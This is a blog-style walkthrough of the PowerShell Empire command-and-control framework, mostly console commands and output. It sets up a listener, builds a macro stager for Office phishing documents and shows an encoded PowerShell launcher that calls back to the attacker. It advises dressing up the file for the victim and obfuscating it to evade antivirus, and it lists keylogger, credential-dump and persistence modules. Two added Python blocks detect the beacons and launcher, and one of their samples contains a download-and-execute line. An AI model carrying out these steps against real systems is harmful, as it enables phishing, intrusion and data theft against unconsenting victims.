I've been playing around enough to familiarize myself with its core functionalities, exploring its different modules for post exploitation and trolling :-) I find Empire a great alternative to Metasploit's Meterpreter functions. Another notable feature of Empire is its use in spear phishing attacks. Unfortunately, I had not much luck obfuscating its payload, as most AV products are able to detect it very easily. This was where I had to use curi0usJack/luckystrike to obfuscate the launcher code into innocent-looking MS Word & Excel docs. I will cover luckystrike in my next post.
The first thing to understand about Empire is its components. First, there is the listener, which is the C&C server. Then there is the launcher or stager, which is the infectious code that is to be executed on the victim hosts (also known as agents).
The agents will connect back to the listener upon successful execution of the launcher or stager code. The listener supports HTTPS if you specify the CertPath directory. You can use the cert creation utility in the setup directory to create a self-signed cert, or use the default one in the data directory. Remember to specify the CertPath if you intend to use HTTPS communication on your listener. In this case, CertPath should be data.
Installing Empire is pretty straightforward, so I am not going to cover it. The first step upon starting Empire is to create a listener:
(Empire) > listeners
[*] Active listeners:
Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
http http http://192.168.43.29:80 5/0.0
(Empire: listeners) > uselistener http
(Empire: listeners) > set CertPath data
(Empire: listeners) > info
Name Required Value Description
---- -------- ------- -----------
SlackToken False Your SlackBot API token to communicate with your Slack instance.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
DefaultLostLimit True 60 Number of missed checkins before exiting
WorkingHours False Hours for the agent to operate (09:00-17:00).
SlackChannel False #general The Slack channel or DM that notifications will be sent to.
DefaultProfile True /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Default communication profile for the agent.
Host True https://192.168.0.163:80 Hostname/IP for staging.
CertPath True data Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
Proxy False default Proxy to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
StagingKey True xxxxxxxxx Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True 80 Port for the listener.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
(Empire: listeners) > execute
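Added example, not code from this post or from the Empire project: a defender-side parser for the DefaultProfile value shown in the listener output above (comma-separated request URIs, then the User-Agent, separated by `|`, plus the optional trailing Header:Value entries Empire profiles allow), applied to constructed web-server log lines to count which clients request exactly those URIs with exactly that User-Agent. The log lines and the 10.0.0.7 client are constructed; the agent IP and timestamps are borrowed from the page's agent listing.

```python
import re
from collections import Counter

# The DefaultProfile string exactly as shown in the listener's "info" output:
# comma-separated request URIs, then the User-Agent, separated by "|". Empire also
# accepts further "|Header:Value" entries after the User-Agent; the parser takes them.
DEFAULT_PROFILE = ("/admin/get.php,/news.php,/login/process.php|"
                   "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko")

def parse_profile(profile):
    """Split an Empire communication profile into (uris, user_agent, extra_headers)."""
    parts = profile.split("|")
    uris = [u.strip() for u in parts[0].split(",") if u.strip()]
    user_agent = parts[1].strip() if len(parts) > 1 else ""
    extra = dict(h.split(":", 1) for h in parts[2:] if ":" in h)
    return uris, user_agent, extra

# Minimal parser for combined-format web/proxy logs: client, request line, status, UA.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

def find_beacons(log_lines, profile):
    """Return a Counter of (client, uri) for requests matching the profile's URIs and UA."""
    uris, ua, _ = parse_profile(profile)
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, _status, agent = m.groups()
        path = path.split("?", 1)[0]  # compare the path only, ignoring any query string
        if path in uris and agent == ua:
            hits[(client, path)] += 1
    return hits

# Constructed log lines (not a real capture). 172.16.155.132 is the agent host in the
# page's "agents" listing; the 5-second spacing matches DefaultDelay 5 / jitter 0.0.
SAMPLE_LOG = [
 '172.16.155.132 - - [28/Oct/2018:14:57:40 +0000] "GET /admin/get.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
 '172.16.155.132 - - [28/Oct/2018:14:57:45 +0000] "POST /login/process.php HTTP/1.1" 200 18 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
 '172.16.155.132 - - [28/Oct/2018:14:57:50 +0000] "GET /news.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
 '10.0.0.7 - - [28/Oct/2018:14:57:51 +0000] "GET /news.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/62.0"',
]

if __name__ == "__main__":
    for (client, uri), n in find_beacons(SAMPLE_LOG, DEFAULT_PROFILE).items():
        print(f"{client} {uri} x{n}")
```

A single URI plus User-Agent match is weak evidence on its own, since the UA is a genuine IE11-on-Windows-7 string; a client that hits all of the profile's URIs at the DefaultDelay cadence is the stronger signal.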
Now that the listener is up and running, you can create the stager. Stagers are useful for phishing attacks, as the code can be easily embedded as a .hta, a .bat, or a macro in MS Office docs. Also worth noting is that Empire supports Python stagers in addition to PowerShell.
(Empire: agents) > usestager windows/macro
(Empire: agents) > info
(Empire: stager/windows/macro) > set Listener http
Name Required Value Description
---- -------- ------- -----------
Listener True Listener to generate stager for.
OutFile False /tmp/macro File to output macro to, otherwise displayed on the screen.
Obfuscate False False Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
ObfuscateCommand False Token\All\1,Launcher\STDIN++\12467 The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Language True powershell Language of the stager to generate.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
Proxy False default Proxy to use for request (default, none, or other).
StagerRetries False 0 Times for the stager to retry connecting.
[*] Stager output written out to: /tmp/macro
Transfer the stager code into an MS Excel or Word file in the Macro section:
Remember to save the file in the Office 97-2003 format and send the file to the victim after dressing it up.
If you intend to use Empire as a lateral movement tool, use the launcher instead. The launcher is a simple PowerShell command encoded in base64 that first calls back to the listener server and, upon interaction, executes directly in memory, invoking your evil deeds. Empire contains plenty of useful modules that can aid penetration testers and red teams in pivoting to different victim hosts.
(Empire: listeners) > launcher powershell http
powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBJAE8AbgBUAGEAYgBMAEUALgBQAFMAVgBFAHIAcwBJAG8AbgAuAE0AQQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAUwBTAEUATQBiAEwAWQAuAEcAZQBUAFQAeQBQAGUAKAAnAF<snip>
(Empire: listeners) >
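As an added example (not code from this post or from the Empire project), a small Python detector for the launcher format shown above: it decodes the `-enc` argument (PowerShell expects base64 of UTF-16LE text) and flags the hidden-window flags together with the `$PSVersionTable` probe and `[ref].Assembly.GetType(` reflection call that are visible at the start of the page's decoded payload. The command lines, the `listener.example` URL and the placeholder type name are constructed samples.

```python
import base64
import re

# Flags from the launcher shown on the page ("powershell -noP -sta -w 1 -enc ...").
HIDDEN_FLAGS = {r"-nop\b": "no profile", r"-w\s+1\b": "hidden window", r"-sta\b": "STA apartment"}
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Patterns to flag in the decoded payload (the first two are in the stub visible on the page).
DECODED_PATTERNS = {
    r"\[ref\]\.assembly\.gettype\(": "reflection into .NET internals",
    r"\$psversiontable\.psversion\.major": "PowerShell version probe",
    r"new-object\s+(?:system\.)?net\.webclient": "web download object",
    r"\biex\b|invoke-expression": "dynamic code execution",
}

def decode_encoded_command(cmdline):
    """Return the -enc payload as text (PowerShell expects UTF-16LE base64), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # truncated (like the <snip> on the page) or not base64 at all

def analyze_cmdline(cmdline):
    """Return (decoded payload or None, list of findings) for one process command line."""
    findings = [why for pat, why in HIDDEN_FLAGS.items() if re.search(pat, cmdline, re.I)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded command")
        findings += [why for pat, why in DECODED_PATTERNS.items() if re.search(pat, decoded, re.I)]
    return decoded, findings

def encode_for_powershell(script):
    """Inverse of -enc; used here only to build the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed samples, not captured from a host. "launcher" copies the shape of the
# page's payload: its visible stub, a placeholder type name, and a hypothetical URL.
SAMPLES = {
    "launcher": "powershell -noP -sta -w 1 -enc " + encode_for_powershell(
        "IF($PSVersionTable.PSVersion.Major -ge 3){$GPF=[ref].Assembly.GetType('PLACEHOLDER')};"
        "$wc=New-Object Net.WebClient;IEX $wc.DownloadString('http://listener.example/admin/get.php')"),
    "admin_script": "powershell -enc " + encode_for_powershell("Get-Date; Get-Service winrm"),
    "plain": "powershell -File C:\\scripts\\backup.ps1",
}
if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, analyze_cmdline(cmd)[1])
```

The "admin_script" sample shows why decoding matters: an encoded command on its own is only a weak indicator, and it is the reflection and download-and-execute patterns in the decoded text that separate the launcher from legitimate administrative use.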
Once the agents have called back, you can begin to interact with them:
(Empire: listeners) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
5CXNH6SE ps 172.16.155.132 WIN-5JJL1Q0I52G WIN-5JJL1Q0I52G\sr powershell 1212 5/0.0 2018-10-28 14:57:50
C3M5VPB2 ps 172.16.155.132 WIN-5JJL1Q0I52G WIN-5JJL1Q0I52G\sr powershell 5104 5/0.0 2018-10-28 14:57:50
(Empire: agents) >
Empire commands support tab completion, so if you are not sure, just press Tab. I find the following modules very useful:
(Empire: 5CXNH6SE) > usemodule
Display all 204 possibilities? (y or n)
code_execution/invoke_dllinjection persistence/elevated/wmi*
code_execution/invoke_metasploitpayload persistence/elevated/wmi_updater*
code_execution/invoke_ntsd persistence/misc/add_netuser
code_execution/invoke_reflectivepeinjection persistence/misc/add_sid_history*
code_execution/invoke_shellcode persistence/misc/debugger*
code_execution/invoke_shellcodemsil persistence/misc/disable_machine_acct_change*
collection/ChromeDump persistence/misc/get_ssps
collection/FoxDump persistence/misc/install_ssp*
collection/USBKeylogger* persistence/misc/memssp*
collection/WebcamRecorder persistence/misc/skeleton_key*
<snip>
<snip>
As mentioned, for phishing attacks, most AV will pick up the execution of PowerShell commands even in memory. I suggest better obfuscation techniques; this is where luckystrike comes in handy.
Here is a video of Empire in action - Part One.
Here is Part 2 of Empire in action, demonstrating the generation of stager code to be used in MS Office Word docs via a macro:
The final part demos Empire functions such as download, shell exec, screendump, VNC and keylogger.